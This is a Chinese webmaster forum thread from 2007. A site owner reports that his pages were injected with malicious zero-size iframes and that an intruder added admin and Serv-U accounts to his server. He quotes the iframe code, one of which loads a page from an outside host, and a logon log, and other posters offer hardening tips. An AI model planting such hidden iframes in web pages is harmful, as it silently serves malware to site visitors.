主页被挂马,服务器被进入,serveru被加用户,求兄弟们帮忙
这是挂马代码:<IFRAME marginWidth=0 marginHeight=0 src="muma.htm" frameBorder=0 width=0 scrolling=no height=0></IFRAME>
<iframe src="http://w.qbbd.com/bd.htm?暂时隐去" width="0" height="0" frameborder="0"></iframe>
进入我系统:
黑客进入我服务器后,先后创建了hack和cao的用户,都是系统管理员权限
相关日志:
登录成功:
用户名: cao
域: ABC-VDDBJJOXSR0
登录 ID: (0x0,0x2898D8)
登录类型: 10
登录进程: User32
身份验证数据包: Negotiate
工作站名: ABC-VDDBJJOXSR0
登录 GUID: -
调用方用户名: ABC-VDDBJJOXSR0$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
调用方进程 ID: 2972
传递服务: -
源网络地址: [size=5][font=宋体]121.29.52.220[/font][/size]
源端口: 2730
然后serveru创建了[font=宋体][size=7]goldsun[/size][/font]域,[size=7]go[/size]用户
个人站长都挺难为的,我因为被挂马,一个ip过w的网站被k,实在很郁闷,希望有类似经历兄弟帮忙
[[i] 本帖最后由 ourfootball 于 2007-4-8 21:29 编辑 [/i]] 能帮忙的兄弟帮忙顶 把你站发出来下?或者单独发我下? [quote]原帖由 [i]emilk[/i] 于 2007-4-8 21:45 发表
把你站发出来下?或者单独发我下? [/quote]
站已经去了木马了 你什么不发怎么帮解决啊? [quote]原帖由 [i]emilk[/i] 于 2007-4-8 21:48 发表
你什么不发怎么帮解决啊? [/quote]
难道被一个人黑还不够?晕了 ...
把你的IIS设置下!把S-U的默认密码该下!你不发谁也不知道原因!只能约莫着说了! [quote]原帖由 [i]emilk[/i] 于 2007-4-8 23:05 发表
...
把你的IIS设置下!把S-U的默认密码该下!你不发谁也不知道原因!只能约莫着说了! [/quote]
我大概知道应该是seru的问题了,谢谢兄弟 1:网站可以注入
2:网站可写入
3:SU 版本太低 我也被挂过:mad: 友情帮顶 *** 作者被禁止或删除 内容自动屏蔽 *** 你还好!!我第一次做站([url]http://www.2mie.cn[/url]),买好了空间挂上去,还是很开心的,毕竞是自己第一次做个草根站长。但不到3天就被挂马啦,好像是什么变种的病毒。真的想不明白一个没流理没收录的网站也被挂马。晕死~~~~
页:
[1]